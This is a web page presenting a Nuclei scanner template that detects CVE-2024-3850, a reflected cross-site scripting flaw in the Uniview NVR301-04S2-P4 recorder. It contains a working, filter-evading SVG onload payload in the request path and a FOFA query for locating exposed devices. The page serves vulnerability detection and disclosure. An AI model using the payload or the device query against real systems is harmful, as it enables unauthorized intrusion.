Skip to content

Uniview NVR301-04S2-P4 - Cross-Site Scripting

ID: CVE-2024-3850

Severity: medium

Author: Bleron Rrustemi,r3naissance

Tags: cve,cve2024,xss,uniview,nvr

Uniview NVR301-04S2-P4 contains a reflected cross-site scripting vulnerability via the PATH of LAPI. CISA and Uniview state that this vulnerability needs to be authenticated. This is incorrect. Any PATH payload can cause XSS. A submission to Mitre has been sent to update the verbiage in the finding as well as the CVSS score.

id: CVE-2024-3850
info:
name: Uniview NVR301-04S2-P4 - Cross-Site Scripting
author: Bleron Rrustemi,r3naissance
severity: medium
description: |
Uniview NVR301-04S2-P4 contains a reflected cross-site scripting vulnerability via the PATH of LAPI. CISA and Uniview state that this vulnerability needs to be authenticated. This is incorrect. Any PATH payload can cause XSS. A submission to Mitre has been sent to update the verbiage in the finding as well as the CVSS score.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
remediation: |
To fix this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
reference:
- https://global.uniview.com/About_Us/Security/Notice/202406/992932_140493_0.htm
- https://nvd.nist.gov/vuln/detail/CVE-2024-3850
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2024-3850
cwe-id: CWE-79
cpe: cpe:2.3:h:uniview:nvr301-04s2-p4:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: Uniview
product: NVR301-04S2-P4
fofa-query: title="NVR301-04-P4"
tags: cve,cve2024,xss,uniview,nvr
http:
- method: GET
path:
- "{{BaseURL}}/V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions?="
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/V1.0<sVg/onload=alert.bind()(1)>/Alarm/Exceptions/LinkageActions?="
condition: and
- type: word
part: header
words:
- NVRDVR
- type: status
status:
- 200
# digest: 4b0a00483046022100b66d0c1007a711f8aca3fcabd9aa815f8fb1d68533313c15c359b838cef417e9022100f6e38b509cbc472bdf5e31719bd32b40e277a8eb158eb58f693298fb8dc39fec:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-3850.yaml"

View on Github